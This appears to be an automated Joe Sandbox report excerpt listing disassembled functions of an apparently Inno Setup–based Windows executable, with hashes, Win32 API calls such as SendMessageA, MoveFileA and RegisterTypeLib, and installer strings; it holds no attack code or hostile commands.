• Opcode ID: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
• Instruction ID: a833d86c80f2fb81cba799e3b93fc1891ddf3ebdd98a67124a25423b7ab76754
• Opcode Fuzzy Hash: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
• Instruction Fuzzy Hash: 563132746057809FC320EF69C984B9BB7E8AF89354F04491EF9D5C3752C638E8818F19
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429808
• SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429837
• SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429853
• SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042987E
• SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042989C
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
• Instruction ID: 8b65b0e689063cc909dba6714575951256d1ad54ff8cece17fd29570ea6901c2
• Opcode Fuzzy Hash: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
• Instruction Fuzzy Hash: 6E219D707107057BEB10AB62DC82F5B7AECAB41708F54443EB501AB2D2DFB8AE418228
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetSystemMetrics.USER32(0000000B), ref: 0041BBCA
• GetSystemMetrics.USER32(0000000C), ref: 0041BBD4
• GetDC.USER32(00000000), ref: 0041BC12
• CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BC59
• DeleteObject.GDI32(00000000), ref: 0041BC9A
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: MetricsSystem$BitmapCreateDeleteObject
• String ID:
• API String ID: 1095203571-0
• Opcode ID: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
• Instruction ID: 2a907a32995036c4e239f44386a828d3a2f1e7d44945ead90e55d18394f4d4ff
• Opcode Fuzzy Hash: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
• Instruction Fuzzy Hash: 5D315C70E00208EFDB04DFA5C941AAEB7F5EB48700F2084AAF514AB781D7789E40DB98
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0045D04C: SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
• GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 00473665
• GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 0047367B
Strings
• Could not set permissions on the registry key because it currently does not exist., xrefs: 0047366F
• Setting permissions on registry key: %s\%s, xrefs: 0047362A
• Failed to set permissions on registry key (%d)., xrefs: 0047368C
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: ErrorLast
• String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
• API String ID: 1452528299-4018462623
• Opcode ID: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
• Instruction ID: ad6b00cc897a6d1501f3fc6a2a631de3da5dc8c6e7b4eccdfad28332e4495c63
• Opcode Fuzzy Hash: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
• Instruction Fuzzy Hash: A121C870A046445FCB10DFA9C8826EEBBE4DF49319F50817BE408E7392D7785E098B6D
Uniqueness

Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
• SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
• SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocString
• String ID:
• API String ID: 262959230-0
• Opcode ID: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
• Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
• Opcode Fuzzy Hash: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
• Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
Uniqueness

Uniqueness Score: -1.00%

APIs
• SelectPalette.GDI32(00000000,00000000,00000000), ref: 00414419
• RealizePalette.GDI32(00000000), ref: 00414421
• SelectPalette.GDI32(00000000,00000000,00000001), ref: 00414435
• RealizePalette.GDI32(00000000), ref: 0041443B
• ReleaseDC.USER32(00000000,00000000), ref: 00414446
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Palette$RealizeSelect$Release
• String ID:
• API String ID: 2261976640-0
• Opcode ID: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
• Instruction ID: 3cc421e061c7a323c9855e33cbe13bf4890882f9e8533d15179bd5f7679f66d2
• Opcode Fuzzy Hash: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
• Instruction Fuzzy Hash: A2018F7520C3806AE600A63D8C85A9F6BED9FCA718F15446EF495DB282DA7AC8018765
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0041F074: GetActiveWindow.USER32 ref: 0041F077
  • Part of subcall function 0041F074: GetCurrentThreadId.KERNEL32 ref: 0041F08C
  • Part of subcall function 0041F074: EnumThreadWindows.USER32(00000000,Function_0001F050), ref: 0041F092
  • Part of subcall function 004231A8: GetSystemMetrics.USER32(00000000), ref: 004231AA
• OffsetRect.USER32(?,?,?), ref: 00424DC9
• DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E8C
• OffsetRect.USER32(?,?,?), ref: 00424E9D
  • Part of subcall function 00423564: GetCurrentThreadId.KERNEL32 ref: 00423579
  • Part of subcall function 00423564: SetWindowsHookExA.USER32(00000003,00423520,00000000,00000000), ref: 00423589
  • Part of subcall function 00423564: CreateThread.KERNEL32(00000000,000003E8,004234D0,00000000,00000000), ref: 004235AD
  • Part of subcall function 00424B2C: SetTimer.USER32(00000000,00000001,?,004234B4), ref: 00424B47
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Thread$CurrentOffsetRectWindows$ActiveCreateDrawEnumHookMetricsSystemTextTimerWindow
• String ID: vLB
• API String ID: 1477829881-1797516613
• Opcode ID: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
• Instruction ID: 1a85cd152e58b5c2614c87f396891e2b5808bef0cf689969089b0637ec596c27
• Opcode Fuzzy Hash: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
• Instruction Fuzzy Hash: C5812675A003188FCB14DFA8D880ADEBBF4FF88314F50416AE905AB296E738AD45CF44
Uniqueness

Uniqueness Score: -1.00%

APIs
• WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00407003
• WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040707D
• WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070D5
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Enum$NameOpenResourceUniversal
• String ID: Z
• API String ID: 3604996873-1505515367
• Opcode ID: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
• Instruction ID: 78f4b6eea80f90a9c0d6dbacb1000d6f5057f9b0a0312f2c839bfa0eabc808a5
• Opcode Fuzzy Hash: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
• Instruction Fuzzy Hash: 14516470E04208AFDB11DF95C951AAFBBB9EF09304F1045BAE500BB3D1D778AE458B5A
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetRectEmpty.USER32(?), ref: 0044D04E
• DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D079
• DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D101
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: DrawText$EmptyRect
• String ID:
• API String ID: 182455014-2867612384
• Opcode ID: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
• Instruction ID: ac611c4ae9e9b4e435f74cd3b872a097dcdbbef8ea8fa2dc8c743a2ef399c877
• Opcode Fuzzy Hash: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
• Instruction Fuzzy Hash: 18517171E00248AFDB11DFA5C885BDEBBF8BF48308F18447AE845EB252D7789945CB64
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDC.USER32(00000000), ref: 0042EF9E
  • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
• SelectObject.GDI32(?,00000000), ref: 0042EFC1
• ReleaseDC.USER32(00000000,?), ref: 0042F0A0
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: CreateFontIndirectObjectReleaseSelect
• String ID: ...\
• API String ID: 3133960002-983595016
• Opcode ID: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
• Instruction ID: de545d42c11d103cbad381cc3223c2b5efa9fdb4a6e9ae4bb0445229962d8c70
• Opcode Fuzzy Hash: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
• Instruction Fuzzy Hash: 5A316370B00128AFDB11EB96D841BAEB7F8EB09348F90447BE410A7392D7785E49CA59
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
• UnregisterClassA.USER32(?,00400000), ref: 004164AB
• RegisterClassA.USER32(?), ref: 004164CE
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Class$InfoRegisterUnregister
• String ID: @
• API String ID: 3749476976-2766056989
• Opcode ID: e22f6c67811b2b5558443c1260ef7bf478b7365ff617af782cc186aba818ddba
• Instruction ID: c77080f262680b7bd3c4c6a37e0a11d074b1995aa9dd52ebf92fb76dd285a693
• Opcode Fuzzy Hash: e22f6c67811b2b5558443c1260ef7bf478b7365ff617af782cc186aba818ddba
• Instruction Fuzzy Hash: B8316D702042409BD720EF69C981B9B77E5AB89308F04457FF949DB392DB39DD44CB6A
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNEL32(00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 00498280
• SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 004982A9
• MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004982C2
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: File$Attributes$Move
• String ID: isRS-%.3u.tmp
• API String ID: 3839737484-3657609586
• Opcode ID: 1f4ba81bd314e92a31c307d6850739873bb922dca52444ea26c7a0748bf5c42b
• Instruction ID: fc33356634acd7bce8b4c2965ae56e8bcff63ef6fc68eceab8a95db248f88364
• Opcode Fuzzy Hash: 1f4ba81bd314e92a31c307d6850739873bb922dca52444ea26c7a0748bf5c42b
• Instruction Fuzzy Hash: 0B216471E00609ABCF10EFA9C8819AFBBB8AF45714F10457FB814B72D1DB389E018A59
Uniqueness

Uniqueness Score: -1.00%

APIs
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
• ExitProcess.KERNEL32 ref: 00404E0D
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: ExitMessageProcess
• String ID: Error$Runtime error at 00000000
• API String ID: 1220098344-2970929446
• Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
• Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
• Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
• Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
  • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
  • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
• LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456C50
• RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456C7D
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
• String ID: LoadTypeLib$RegisterTypeLib
• API String ID: 1312246647-2435364021
• Opcode ID: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
• Instruction ID: 3ed1135b8019c5f4588910a0035f5c9e1cabb82a18fedb82429c118dce795412
• Opcode Fuzzy Hash: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
• Instruction Fuzzy Hash: 2911B430B00604AFDB02EFA6CD51A5EB7BDEB89705F5184B6FC44D3752DA389904CA24
Uniqueness
Uniqueness Score: -1.00%

APIs
• SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 0045716E
• SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045720B
Strings
• Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 0045719A
• Failed to create DebugClientWnd, xrefs: 004571D4
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: MessageSend
• String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
• API String ID: 3850602802-3720027226
• Opcode ID: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
• Instruction ID: a6ca84080c04e90ac639e3db27cd2c1e4b46fe4ea5f20cae781d9f83c3d7e460
• Opcode Fuzzy Hash: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
• Instruction Fuzzy Hash: 1011E770248240AFD710AB69AC85B5FBBD89B54319F15407AFA849B383D7798C18C7AE
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
• GetFocus.USER32 ref: 00478757
• GetKeyState.USER32(0000007A), ref: 00478769
• WaitMessage.USER32(?,00000000,00478790,?,00000000,004787B7,?,?,00000001,00000000,?,?,?,00480402,00000000,004812C8), ref: 00478773
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: FocusMessageStateTextWaitWindow
• String ID: Wnd=$%x
• API String ID: 1381870634-2927251529
• Opcode ID: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
• Instruction ID: f17a5035e7dee30901ec9a03c3a5a372f1d0714b29ccd98a4f066b2945bd060b
• Opcode Fuzzy Hash: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
• Instruction Fuzzy Hash: CE11C634A40244AFD704EF65DC49A9EBBF8EB49314F6184BFF409E7681DB386D00CA69
Uniqueness
Uniqueness Score: -1.00%

APIs
• FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E618
• FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E627
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Time$File$LocalSystem
• String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
• API String ID: 1748579591-1013271723
• Opcode ID: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
• Instruction ID: 5dd65cae4c1adac9d47cc9ad6336eda1851498fedff4a8a979bd050f9c4a6815
• Opcode Fuzzy Hash: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
• Instruction Fuzzy Hash: A81136A440C3909ED340DF2AC04432BBAE4AB99704F44892EF8C8C6381E779C848DBB7
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F83
  • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
• MoveFileA.KERNEL32(00000000,00000000), ref: 00453FA8
  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: File$AttributesDeleteErrorLastMove
• String ID: DeleteFile$MoveFile
• API String ID: 3024442154-139070271
